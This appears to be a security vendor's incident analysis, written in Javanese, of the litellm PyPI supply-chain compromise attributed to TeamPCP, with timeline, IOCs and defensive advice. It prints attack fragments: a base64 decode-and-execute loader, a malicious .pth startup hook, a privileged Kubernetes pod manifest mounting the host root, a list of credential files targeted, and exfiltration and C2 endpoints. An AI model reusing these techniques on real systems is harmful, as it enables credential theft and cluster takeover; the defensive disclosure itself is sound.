Serangan Rantai Pasokan LiteLLM

Serangan Rantai Pasokan LiteLLM: Kepiye TeamPCP Nggawe Infrastruktur AI Backdoor

Kenapa Iki Penting

Ing tanggal 24 Maret 2026, paket Python sing populer litellm, gateway proxy LLM universal sing digunakake dening ewonan enterpriseKanggo ngarahake lalu lintas antarane aplikasi lan panyedhiya AI kaya OpenAI, Anthropic, Google, lan AWS Bedrock, disusupi kanthi meneng-meneng ing PyPI. Rong versi sing diracuni (1.82.7 lan 1.82.8) diterbitake sajrone 13 menit, nggawa muatan multi-tahap sing nyolong kredensial, ngekstrak rahasia maya, nyebar kanthi lateral ing kluster Kubernetes, lan nginstal backdoor persisten kanthi kemampuan eksekusi kode jarak jauh.

Kanthi kira-kira 3.6 yuta unduhan saben dina lan panyebaran sing jero ing infrastruktur AI asli méga, litellm ana ing persimpangan kabeh sing dikarepake para penyerang modern: kunci API kanggo saben panyedhiya AI utama, kredensial IAM méga, rahasia Kubernetes, lan kunci SSH.

Nanging kompromi litellm dudu kedadeyan sing kapisah. Iku minangka puncak saka a kampanye limang dina, limang ekosistem dening aktor ancaman sing dikenal minangka TeamPCP, kampanye sing pisanan ngracuni pemindai keamanan (Aqua Trivy, Checkmarx KICS), banjur nggunakake sing dicolong CI/CD kredensial kanggo ngalir mudhun menyang npm, OpenVSX, lan pungkasane PyPI. Para penyerang nggunakake piranti sing digunakake organisasi kanggo nglindhungi rantai pasokan.

Serangan iki minangka owah-owahan langkah ing kecanggihan ancaman rantai pasokan. Desain multi-hop, lintas-ekosistem, ngorbanake piranti keamanan kanggo nggayuh nilai dhuwur. Infrastruktur AI, nggambarake tingkat perencanaan lan kematangan operasional sing konsisten karo piranti serangan sing saya tambah akeh. Payload kasebut diulang kanthi wektu nyata (telung varian payload katon ing kode sumber, kalebu versi sadurunge sing dikomentari), infrastruktur C2 didaftarake sedina sadurunge serangan, lan domain exfiltration dipilih kanthi ati-ati kanggo niru infrastruktur vendor sing sah. Pemanen kredensial sing komprehensif sacara sistematis, sing nyakup 15+ kategori kalebu target niche kaya kunci penandatanganan Cardano lan konfigurasi WireGuard, nuduhake tingkat tuntas sing nuduhake pangembangan malware sing dibantu AI minangka pengganda kekuatan.

timeline

Tanggal (UTC) Event
Maret 19 TeamPCP ngrusak tag Aqua Trivy GitHub Action, ngganti karo kode jahat sing metu saka filter CI/CD rahasia saka gudang hilir
Maret 21 Kompromi uga ditrapake kanggo Checkmarx KICS lan AST GitHub Actions nggunakake teknik sing padha.
22 Maret, 06:35 BerriAI nerbitake litellm 1.82.6 (versi resik pungkasan) liwat normal CI/CD pipeline sing nggunakake Trivy kanggo mindhai keamanan
Maret 23 TeamPCP ndhaftar models.litellm.cloud (domain exfiltration). Ngrusak 66+ paket npm lan ekstensi OpenVSX
24 Maret, 10:39 litellm 1.82.7 diterbitake menyang PyPI -- muatan diinjeksi menyang proxy_server.py ing ruang lingkup modul. Dilakokake nalika impor
24 Maret, 10:52 litellm 1.82.8 diterbitake 13 menit sabanjure -- nambahake litellm_init.pth, hook konfigurasi path Python sing dieksekusi ing saben wiwitan interpreter Python, ora mung impor litellm. Nuduhake iterasi muatan sing cepet
24 Maret, ~16:00 PyPI mbusak loro versi kasebut sawise laporan komunitas. Versi kasebut dibusak kabeh (ora dicopot) saka indeks, sanajan tarball CDN tetep bisa diakses.

Jendhela paparan: kira-kira 5.5 jam. Sajrone wektu iki, apa wae pip install litellm, pip install --upgrade litellm, utawa CI/CD pipeline narik versi paling anyar bakal nglakokake payload.

Kepiye Malware Bisa Mlebu: Kompromi Bertingkat

Paket litellm ora dibobol langsung. Penyerang nggayuh liwat Serangan rantai pasokan rong hop:

Aqua Trivy GitHub Action (compromised March 19)     --> LiteLLM CI/CD pipeline runs Trivy without pinned version         --> Malicious Trivy exfiltrates PYPI_PUBLISH token from GitHub Actions runner             --> Attacker publishes poisoned litellm 1.82.7 and 1.82.8 directly to PyPI

LiteLLM's CI/CD pipeline nggunakake Trivy minangka pemindai keamanan — alat sing dirancang kanggo nyekel kerentanan iku dhewe minangka vektor serangan. Amarga pipeline Trivy sing direferensikake nganggo tag sing bisa diowahi tinimbang sing disematkan commit SHA, tumindak sing wis disusupi mlaku kanthi otomatis. Tindakan Trivy sing jahat iki ngekstrak rahasia lingkungan, kalebu PYPI_PUBLISH token, menehi TeamPCP akses penerbitan langsung menyang proyek PyPI litellm.

Strategi "ngompromi para penjaga" iki minangka ciri khas kampanye TeamPCP. Kanthi ngincer piranti keamanan dhisik (Trivy, Checkmarx KICS), para penyerang bebarengan mateni deteksi lan entuk akses istimewa menyang rantai pasokan hilir.

Analisis Teknis: Muatan

Titik Injeksi

versi 1.82.7 — Eksekusi tingkat modul ing litellm/proxy/proxy_server.py (baris 128):

import subprocess, base64, sys, tempfile, os  b64_payload = "<~12KB base64 blob>"  with tempfile.TemporaryDirectory() as d:     p = os.path.join(d, "p.py")     with open(p, "wb") as f:         f.write(base64.b64decode(b64_payload))     subprocess.run([sys.executable, p])

Kode iki ana ing ruang lingkup modul antarane literal kamus lan asline showwarning() fungsi. Iki langsung dieksekusi nalika litellm.proxy.proxy_server diimpor — sing kedadeyan ing sembarang panggunaan fungsi proxy litellm.

versi 1.82.8 — Ditambahake litellm_init.pth (Berkas konfigurasi jalur Python):

import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"], ...) 

Python .pth file ing site-packages/ diproses ing saben wiwitan interpreter, nanging mung baris sing diwiwiti karo import dieksekusi minangka kode. Penyerang ngeksploitasi iki kanthi nggandheng kabeh muatan menyang siji import pratelan: import os, subprocess, sys; subprocess.Popen(...)Iki luwih agresif tinimbang injeksi proxy_server.py — iki bakal mlaku sanajan litellm ora tau diimpor, ing saben peluncuran proses Python. pyproject.toml diowahi kanggo nglebokaké berkas iki ing distribusi:

include = [     { path = "litellm_init.pth", format = ["sdist", "wheel"] } ]

Versi 1.82.8 mangkono nduweni rong jalur eksekusi independen: injeksi proxy_server.py (diaktifake ing impor proxy litellm) lan file .pth (diaktifake ing sembarang startup Python). Redundansi kasebut dhewe penting - iki nglindhungi saka deteksi utawa mbusak salah siji jalur kasebut. Eskalasi saka wektu impor menyang eksekusi wektu wiwitan mung 13 menit sawise 1.82.7 nuduhake yen penyerang ngawasi sukses penyebaran lan kanthi cepet iterasi.

Tahap 1: Panen Kredensial Komprehensif

Skrip njero sing didekode minangka vakum kredensial sing teliti. Iki nggunakake os.walk()glob.glob()subprocess.check_output(), lan maca file langsung kanggo nyapu kabeh sistem:

Kategori target
Rekondisi sistem hostname, whoami, uname -a, ip addr, printenv, ip route
SSH ~/.ssh/id_rsa, id_ed25519, id_ecdsa, authorized_keys, known_hosts, config; kunci host saka /etc/ssh/
Cloud (AWS) ~/.aws/credentials, ~/.aws/configKredensial peran IMDS liwat 169.254.169.254Manajer Rahasia ListSecretsSSM DescribeParameters
Cloud (GCP) ~/.config/gcloud/ (rekursif); $GOOGLE_APPLICATION_CREDENTIALS
Awan (Biru) ~/.azure/ (rekursif); variabel lingkungan
Kubernetes Token akun layanan; ca.crt; ruang jeneng; kubectl get secrets --all-namespaces; kabeh rahasia liwat K8s API
File lingkungan .env, .env.local, .env.production, .env.development, .env.staging — digoleki kanthi rekursif (jero 6) ing sadawane /home, /root, /opt, /srv, /var/www, /app, /data, /tmp
docker ~/.docker/config.json, /kaniko/.docker/config.json
Token paket ~/.npmrc, ~/.vault-token, ~/.netrc
data ~/.pgpass, ~/.my.cnf, /etc/mysql/my.cnf, /etc/redis/redis.conf, konfigurasi MongoDB
TLS / SSL Kunci pribadi saka /etc/ssl/private/, Ayo Enkripsi sertifikat, kabeh .pem/.key/.p12/.pfx file
Git ~/.git-credentials, ~/.gitconfig
CI/CD terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, Jenkinsfile, ansible.cfg
Dompet Crypto Bitcoin, toko kunci Ethereum, pasangan kunci Solana (validator, swara, saham, faucet), kunci penandatanganan Cardano, Litecoin, Dogecoin, Zcash, Dash, Ripple, Monero
Sajarah cangkang .bash_history, .zsh_history, .mysql_history, .psql_history, .rediscli_history
Otorisasi sistem /etc/passwd, /etc/shadow, log otorisasi (sesi SSH sing ditampa)
Tombol Webhook/API Grep kanggo web Slackhooks, Jaringan Discordhooks, kunci/rahasia API ing file konfigurasi
VPN Konfigurasi WireGuard saka /etc/wireguard/

Cakupan piranti panen iki ensiklopedis. Piranti iki ora mung ngincer kredensial méga nanging uga dompet cryptocurrency, sandhi basis data, konfigurasi VPN, lan CI/CD rahasia — nuduhake yen penyerang duwe niat kanggo monetisasi sistem sing wis disusupi ing pirang-pirang vektor.

Tahap 2: Eksfiltrasi sing dienkripsi

Data sing dicolong dienkripsi lan diekstrak nggunakake skema enkripsi hibrida:

  • AES-256-CBC enkripsi kabeh data sing diklumpukake nganggo kunci sesi 32-byte acak (liwat openssl enc)
  • RSA-4096 enkripsi kunci sesi nggunakake kunci publik sing dipasangake penyerang (padding OAEP, liwat openssl pkeyutl)
  • Kaloro file ciphertext digabungake minangka tpcp.tar.gz (Ing tpcp awalan — “TeamPCP” — katon kanthi konsisten ing saindhenging kampanye)
  • HTTPS POST menyang https://models.litellm.cloud/ karo Content-Type: application/octet-stream

Domain kasebut models.litellm.cloud didaftarake tanggal 23 Maret — sedina sadurunge serangan — lan dirancang kanggo nyampur karo infrastruktur litellm sing sah (proyek sing nyata nggunakake litellm.aiSanajan pemain bertahan sing ngerti jaringan sing mriksa lalu lintas metu bisa uga ora menehi tandha lalu lintas menyang apa sing katon minangka titik pungkasan model litellm dhewe.

Tahap 3: Backdoor Persisten (sysmon.py)

Payload nginstal backdoor polling sing disamar minangka telemetri sistem:

  • Path~/.config/sysmon/sysmon.py
  • Servicesysmon.service (unit panganggo sistem, diterangake minangka "Layanan Telemetri Sistem")
  • PrilakuSawise turu 300 detik pisanan, polling https://checkmarx.zone/raw saben ~50 menit
  • executionNgundhuh URL sing dibalekake dening C2 menyang /tmp/pglog, nyetel supaya bisa dieksekusi (chmod 755), nglakokake ing sesi sing kapisah
  • Pelacakan negara/tmp/.pg_state nyegah ngundhuh maneh payload sing padha
  • KegiyatanRestart=alwaysRestartSec=10 — tahan crash lan reboot

Domain kasebut checkmarx.zone kuwi salah ketik saka Checkmarx (perusahaan keamanan ing checkmarx.com), dirancang supaya analis SOC sing mriksa log jaringan bisa ndeleng lalu lintas menyang apa sing katon minangka vendor keamanan sing sah. Iki minangka teknik penghindaran sing disengaja sing konsisten karo strategi TeamPCP sing luwih jembar kanggo ndhelik ing mburi branding vendor keamanan.

Tahap 3b: Gerakan Lateral Kubernetes

Yen sistem sing disusupi duwe kredensial akun layanan Kubernetes, malware kasebut bakal ngetung kabeh node kluster lan nyebarake. pod istimewa kanggo saben wong:

pod_manifest = {     'apiVersion': 'v1', 'kind': 'Pod',     'metadata': {'name': f'node-setup-{node_name[:35]}', 'namespace': 'kube-system'},     'spec': {         'nodeName': node_name,         'hostPID': True, 'hostNetwork': True,         'tolerations': [{'operator': 'Exists'}],         'containers': [{             'name': 'setup',             'image': 'alpine:latest',             'command': ['sh', '-c', drop_cmd],             'securityContext': {'privileged': True},             'volumeMounts': [{'name': 'host', 'mountPath': '/host'}]         }],         'volumes': [{'name': 'host', 'hostPath': {'path': '/'}}],         'restartPolicy': 'Never'     } }

Saben polong:

  • Mlaku minangka kebon karo hostPIDhostNetwork, lan akses sistem file host lengkap
  • ulah chroot /host kanggo nginstal sing padha sysmon.py backdoor ing sistem file root host
  • Ndhaptar minangka layanan systemd, njamin persistensi bisa tahan sawise pambusakan pod
  • jenenge node-setup-* ing kube-system namespace supaya katon minangka infrastruktur kluster sing sah

Iki tegese siji sing dikompromi CI/CD runner nganggo akses K8s bisa nyebabake saben node ing kluster ditutup ing mburi — skenario gerakan lateral sing dahsyat kanggo organisasi sing nglakokake litellm minangka proxy ing Kubernetes.

Evolusi Muatan (Varian sing Dikomentari)

Kode sumber ing baris 131-132 ngemot rong varian muatan sing wis dikomentari sadurunge, sing nuduhake proses pangembangan penyerang:

  • Kabeh telung varian nuduhake infrastruktur eksfiltrasi sing padha (models.litellm.cloud), kunci publik RSA-4096, bungkus enkripsi hibrida AES-256-CBC + RSA, lan tpcp.tar.gz penamaan bundel
  • Varian sadurungé nambahake Lapisan enkripsi RC4 ing njero skrip pangumpulan data, ngenkripsi data sing dipanen sadurunge bungkus AES+RSA njaba. Muatan aktif (baris 130) disederhanakake kanthi mbusak lapisan RC4 njero iki
  • Varian sadurungé migunakaké exec() karo StringIO nyekel kanggo mbukak kolektor sing lagi diproses, dene muatan aktif nggunakake subprocess.run() nganggo stdout redirect — pamisahan sing luwih resik sing ngindhari polusi proses host
  • Kabeh telung varian nargetake kategori kredensial lan jalur pengumpulan sing padha
  • Kunci RC4 ing varian sadurungé minangka cercaan provokatif, cocog karo prilaku aktor sing nggoleki perhatian ing Telegram.

Iki nuduhake perkembangan aktif sajrone operasi. Penyerang nyederhanakake tumpukan enkripsi lan ningkatake isolasi eksekusi nalika njaga target koleksi lan infrastruktur exfiltration tetep stabil.

Indikator Kompromi (IOC)

Network

indikator Koleksi maksud
models.litellm.cloud domain Titik akhir eksfiltrasi (HTTPS POST)
checkmarx.zone domain Titik pungkasan polling C2 (HTTPS GET /raw)

Cathetan: Pranala pelaporan eksternal checkmarx.zone/static/checkmarx-util-1.0.4.tgz menyang fase KICS sadurungé saka kampanye TeamPCP. URL iki ora ditemokake ing muatan litellm sing dianalisis ing kene.

Paket Hash

file SHA256
litellm-1.82.7.tar.gz 8a2a05fd8bdc329c8a86d2d08229d167500c01ecad06e40477c49fb0096efdea
litellm-1.82.8.tar.gz d39f4e7a218053cce976c91eacf184cf09a6960c731cc9d66d8e1a53406593a5

Sistem berkas

indikator Koleksi maksud
~/.config/sysmon/sysmon.py file Skrip backdoor sing terus-terusan
~/.config/systemd/user/sysmon.service file Unit persistensi sistemik
/tmp/pglog file Binary tahap kapindho sing diunduh
/tmp/.pg_state file Pelacakan status C2
litellm_init.pth in site-packages/ file Hook wiwitan Python (mung v1.82.8)
tpcp.tar.gz file Bundel eksfiltrasi sing dienkripsi

Kubernetes

indikator Koleksi maksud
node-setup-* polong ing kube-system pod Pod gerakan lateral sing istimewa
sysmon.service ing simpul kluster Service Persistensi tingkat host liwat pod escape

Kriptografi

indikator Details
Kunci publik RSA-4096 panyerang Sidik jari SHA256: bc40e5e2c438032bac4dec2ad61eedd4e7c162a8b42004774f6e4330d8137ba8Dilebokaké ing kabèh telung varian muatan; kunci sing padha dilapurake ing operasi TeamPCP liyané
tpcp awalan ing artefak Konvensi penamaan bundel (tpcp.tar.gz) konsisten ing saindhenging kampanye

Atribusi: TeamPCP

Aktor ancaman ing mburi kampanye iki dilacak minangka TeamPCP, uga dikenal minangka PCPcat, Persy_PCP, ShellForce, lan DeadCatx3.

Ciri-ciri sing dikenal:

  • Njaga saluran Telegram ing @Persy_PCP lan @teampcp ing ngendi dheweke ngece perusahaan keamanan
  • Bisa digunakake ing pirang-pirang ekosistem (GitHub Actions, PyPI, npm, OpenVSX)
  • Nggunakake domain typosquat khusus vendor kanggo saben fase kampanye (contone, checkmarx.zone kanggo Checkmarx, models.litellm.cloud kanggo litellm)
  • Penanda infrastruktur sing konsisten: pasangan kunci RSA sing padha, tpcp.tar.gz konvensi penamaan, tpcp-docs-* Repositori GitHub digunakake minangka pementasan dead-drop
  • Narget piranti keamanan minangka titik mlebu menyang rantai pasokan hilir

Kapercayan atribusiDhuwur. Kunci publik RSA sing dienggo bareng, tpcp Penamaan artefak, tumpang tindih infrastruktur C2, lan tempo operasional sajrone kampanye limang dina nduweni pranala sing kuwat antarane kompromi Trivy, KICS, npm, OpenVSX, lan litellm karo aktor sing padha.

motivasiKamungkinan finansial (nyolong dompet kripto, monetisasi kredensial méga) digabungake karo kondhang (ejekan Telegram). Jembaré panen kredensial — saka AWS IAM nganti pasangan kunci validator Solana nganti konfigurasi WireGuard — nuduhaké aktor sing dimotivasi sacara finansial sing ngupaya ngoptimalake ROI saka saben kompromi.

Bantuan AI sing bisa ditindakakePemanen kredensial iki komprehensif sacara sistematis — 15+ kategori kalebu target niche kaya kunci penandatanganan Cardano, konfigurasi WireGuard, lan kredensial Kaniko Docker — kanthi cara sing konsisten karo enumerasi sing dibantu AI. Kacepetan iterasi muatan (telung varian kanthi skema enkripsi sing beda), koordinasi lintas-ekosistem (5 ekosistem sajrone 5 dina), lan OPSEC operasional (domain sing niru vendor, enkripsi hibrida, persistensi sistem sing disamarkan minangka telemetri) nuduhake tingkat throughput sing bisa uga nggambarake pangembangan sing dibantu AI minangka pengganda kekuatan. Penilaian iki spekulatif; operator trampil bisa entuk ruang lingkup sing padha tanpa piranti AI.

TTP lan Teknik Anyar

1. Keracunan Rantai Pasokan Piranti Keamanan (varian T1195.002)

Ngompromikake pemindai keamanan (Trivy, KICS) minangka langkah pertama kanggo nggayuh target hilir minangka eskalasi anyar. Penyerang ora mung ngompromi perpustakaan — dheweke uga ngompromikake alat sing digunakake organisasi kanggo ndeteksi perpustakaan sing disusupi. Iki nggawe titik buta: pemindai sing kudune nyekel kode jahat iku dhewe minangka mekanisme pangiriman.

2. Python .pth Persistensi Berkas (T1546)

The litellm_init.pth Teknik ing v1.82.8 iku mbebayani banget. Python .pth file ing site-packages/ diproses ing saben wiwitan juru basa; baris apa wae sing diwiwiti karo import dieksekusi minangka kode. Kanthi nggandhengake muatan menyang siji import pernyataan, penyerang nglakokake eksekusi ing saben proses Python — ora mung nalika litellm diimpor. Iki tegese payload bakal aktif sanajan litellm wis diinstal nanging ora tau digunakake, lan bisa slamet saka remediasi sing ngganti file sing wis dikompromi. .py berkas tanpa mriksa .pth file.

3. Gerakan Lateral Kluster-Wide Kubernetes liwat Privileged Pod Deployment (T1610, T1611)

Nggawe pod istimewa kanthi otomatis ing saben simpul kluster — kanthi hostPIDhostNetwork, pemasangan sistem berkas host, lan chroot kanggo nginstal persistence — nggandhengake penyebaran kontainer (T1610) karo escape menyang host (T1611) kanggo ngowahi beban kerja sing dikompromi dadi kompromi kluster lengkap.

4. Infrastruktur C2 sing Niru Vendor

nggunakake models.litellm.cloud (niru litellm) lan checkmarx.zone (niru Checkmarx) amarga titik pungkasan C2/exfil dirancang kanggo ngindhari pemantauan jaringan. Analis SOC sing mriksa lalu lintas metu bakal weruh sambungan HTTPS menyang domain vendor sing katon sah.

5. Iterasi Muatan Dalam Penerbangan sing Cepet

Nerbitake v1.82.7 kanthi eksekusi wektu impor, banjur v1.82.8 kanthi eksekusi wektu wiwitan 13 menit sabanjure, nuduhake penyerang ngawasi lan adaptasi kanthi wektu nyata. Varian muatan sing dikomentari (kanthi skema enkripsi sing beda) sing disimpen ing kode sumber ngonfirmasi pangembangan aktif sajrone operasi.

Apa sing bisa ditindakake

Serangan iki ngeksploitasi kepercayaan ing saben lapisan: kepercayaan marang piranti keamanan, kepercayaan marang registri paket, kepercayaan marang domain sing katon akrab, kepercayaan marang CI/CD otomatisasi. Mbela saka iku mbutuhake nguatake saben wates kepercayaan iki:

Kanggo Konsumen Paket

  • Ketergantungan pin miturut hash, ora mung versi. pip install litellm==1.82.6 --hash=sha256:... bakal nyegah versi sing wis disusupi supaya ora diinstal sanajan katon sedhela minangka versi paling anyar.
  • Gunakake file kunci. pip-compilepoetry.lock, Lan uv.lock nangkep versi lan hash sing pas. CI/CD kudune diinstal saka file kunci, dudu saka penentu versi ngambang.
  • Monitor kanggo .pth file. Audit rutin site-packages/ kanggo sing ora dikarepke .pth file — file-file kasebut dieksekusi ing saben startup Python lan minangka mekanisme persistensi sing kurang diapresiasi.
  • Nglakokake kontrol jaringan metu. Eksfiltrasi menyang models.litellm.cloud lan polling C2 kanggo checkmarx.zone bisa uga kejiret dening panyaringan metu adhedhasar dhaptar ijin ing lingkungan produksi.

Kanggo Pangopèn Paket

  • Pin CI/CD tumindak dening commit SHA, dudu tag. LiteLLM's pipeline nggunakake Trivy tanpa versi sing disemat. Yen wis dirujuk aquasecurity/trivy-action@<commit-sha> tinimbang @latest, tumindak sing wis dikompromi ora bakal ditindakake.
  • Gunakake token penerbitan sing umure cendhak lan winates. PyPI ndhukung Trusted Publishers (adhedhasar OIDC) lan token API sing diliput. Token sing diekstrak PYPI_PUBLISH token ora kudune duwe akses penerbitan sing tahan suwe lan ora diwatesi.
  • Aktifake otentikasi rong faktor ing PyPI. Mbutuhake 2FA kanggo kabeh pangopèn lan gunakake kunci keamanan perangkat keras yen bisa.
  • Paket tandha tangan. Pengesahan Sigstore/PEP 740 ngidini konsumen kanggo verifikasi manawa paket digawe miturut sing diarepake CI/CD pipeline, dudu dening penyerang sing nggawa token sing dicolong.

Kanggo Operator Platform (PyPI, npm, GitHub)

  • Ndeteksi pola penerbitan sing ora normal. Rong versi anyar sing diterbitake kanthi jarak 13 menit, saka IP utawa token sing beda saka biasane, kudune micu ditahan kanggo ditinjau utawa pemindaian otomatis sadurunge paket bisa diinstal.
  • Nyepetake adopsi Penerbit sing Dipercaya. Penerbitan berbasis OIDC nggandhengake paket karo repositori lan alur kerja tartamtu, saengga token sing dicolong ora ana gunane ing njaba asline. CI/CD kontek
  • Nglakokake pemindaian malware wektu publikasi. Payload sing didekode base64 ing proxy_server.py bakal bisa dideteksi nganggo analisis statis nalika wektu publikasi.

Kanggo Ekosistem

  • Anggep piranti keamanan minangka infrastruktur sing penting. Trivy lan Checkmarx KICS digunakake dening mayuta-yuta wong pipelines. Tindakan GitHub kudu ditandatangani, disemat, lan dipantau kanthi ketelitian sing padha karo paket sing dipindai.
  • Nandur modal ing deteksi runtime. Analisis statis waé ora bisa nyekel saben teknik obfuskasi. Pemantauan runtime saka instalasi paket hooks, sambungan jaringan sing ora dikarepke, lan pola akses file sing mencurigakan nyedhiyakake pertahanan sing jero.
  • Nuduhake intelijen ancaman luwih cepet. Jendhela paparan 5.5 jam kanggo litellm bisa uga luwih cendhek kanthi koordinasi lintas vendor sing luwih cepet. Layanan pemindaian otomatis kaya Xygeni MEW, Socket, lan Snyk ndeteksi anomali kasebut — hambatan kasebut yaiku konfirmasi manungsa lan wektu respon registri.

kesimpulan

Kampanye TeamPCP minangka momen penting kanggo software supply chain securityKanthi ngorbanake pemindai keamanan dhisik lan nggunakake minangka watu loncatan kanggo infrastruktur AI sing regane dhuwur, para penyerang nduduhake manawa rantai pasokan mung kuwat kaya ketergantungan transitif sing paling ringkih, lan ketergantungan kasebut bisa uga dadi alat keamanan sing sampeyan percaya kanggo njaga keamanan sampeyan.

Kompromi litellm khusus nyoroti risiko sing saya tambah kanggo infrastruktur AI. Nalika gateway proxy LLM dadi standard pola kanggo enterprise Kanthi panyebaran AI, dheweke nglumpukake akses menyang kunci API, kredensial maya, lan data sensitif ing siji komponen. Ngompromikake komponen kasebut minangka kunci kerangka kanggo kabeh tumpukan AI.

Organisasi sing nginstal litellm 1.82.7 utawa 1.82.8 sajrone wektu 5.5 jam kudu nganggep iki minangka kompromi kredensial lengkap: muter kabeh rahasia ing sistem sing kena pengaruh, audit kluster Kubernetes kanggo node-setup-* polong ing kube-system, mbusak apa wae sysmon.service unit sistem, lan priksa litellm_init.pth nganggo Python site-packages/ direktori. Panganggo gambar Docker resmi (ghcr.io/berriai/litellm) ora kena pengaruh, amarga gambar kasebut nyemat dependensi lan ora dibangun maneh sajrone jendela eksposur.

Babagan Author

Co-Founder & CTO

Louis Rodriguez iku Co-Founder lan CTO ing Xygeni Security. Kanthi pengalaman luwih saka 20 taun ing keamanan aplikasi, dhèwèké fokus ing pangayoman AppSec lan kemampuan analisis kode canggih sing mbantu tim nyuda risiko pangiriman nyata.

 
piranti lunak-piranti-sca-piranti-analisis-komposisi
Prioritasake, ndandani, lan amanake risiko piranti lunak sampeyan
Entuk Akun Gratismu.
Ora ana kertu kredit.

Amanake Pangembangan lan Pangiriman Piranti Lunak Sampeyan

karo Suite Produk Xygeni